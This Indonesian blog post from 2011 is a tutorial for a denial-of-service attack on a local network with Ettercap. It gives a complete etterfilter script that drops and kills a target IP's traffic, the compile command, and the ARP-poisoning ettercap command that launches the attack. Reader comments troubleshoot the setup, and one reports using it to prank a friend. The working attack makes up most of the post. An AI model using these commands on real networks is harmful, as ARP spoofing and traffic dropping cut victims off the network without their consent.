Monday, September 5, 2011

Denial Of Services dengan Ettercap

Dulu Ane pernah buat tulisan tentang DOS dengan metasploit, sekarang ane akan kasih tau cara melakukan DOS menggunakan Ettercap, tanpa basa-basi kita landsung meluncur keTKP.

1. Buka Gedit (atau file editor apapun) kemudian tulis perintah copas perintah dibawah ini.

if(ip.src == 'IP_TARGET' || ip.dst == 'IP_TARGET') {
drop();
kill();
msg("Gilakomputer mencoba menyerang !!\n");
}

ganti IP_TARGET dengan IP Address target yang akan diserang kemudian simpan dengan nama dos.eft


2. Convert file dos.eft menjadi dos.ef

etterfilter dos.eft -o dos.ef


3. Lakukan serangan

ettercap -T -q -F /root/dos.ef -M ARP /IP_TARGET/ // -i kartu_jaringan


Jika Sikorban mengakses Internet maka akan muncul tampilan seperti ini.


Dan ini adalah hasil dari kelakuan kalian

Windows XP


Windows 7 yang juga ikut KO


semoga tutorial ini jadi pelajaran ya buat kita.

kontraktor acp

Author & Editor

Has laoreet percipitur ad. Vide interesset in mei, no his legimus verterem. Et nostrum imperdiet appellantur usu, mnesarchum referrentur id vim.

9 comments:

  1. gan, ane kok gak bisa si ?
    pas ngetik

    etterfilter dos.eft -o dos.ef


    keluar nya bgini :

    The program 'etterfilter' is currently not installed. You can install it by typing:
    apt-get install ettercap-common
    You will have to enable the component called 'universe'

    ReplyDelete
  2. @kianny

    Oh itu karena ettercapnya belum diinstall, coba install dulu pake perintah apt-get install ettercap-common, terima kasih,:)

    ReplyDelete
  3. makasih mas @Octopurba
    190mb,,,huuu besar

    ReplyDelete
  4. @kianny

    hehe.. tungguin aja, entar juga kelar,hoho..

    ReplyDelete
  5. Gan kenapa keluar ( Cannot load filter file "/root/dos.ef" ) pnya ane interface nya eth1... Please solution... sukses GK. :)

    ReplyDelete
    Replies
    1. oh itu hanya salah tempat aja bro, coba pastikan tempat dos.ef nya benar, sukses jua bro,:)

      Delete
  6. Thx bang,Berhasil ane hehe jailin temen ane..
    oiya bang cara balikinnya begimana?kasihan temen ane hehe.

    ReplyDelete

Silahkan meninggalkan pesan jika artikel diatas membantu anda,:)

 
biz.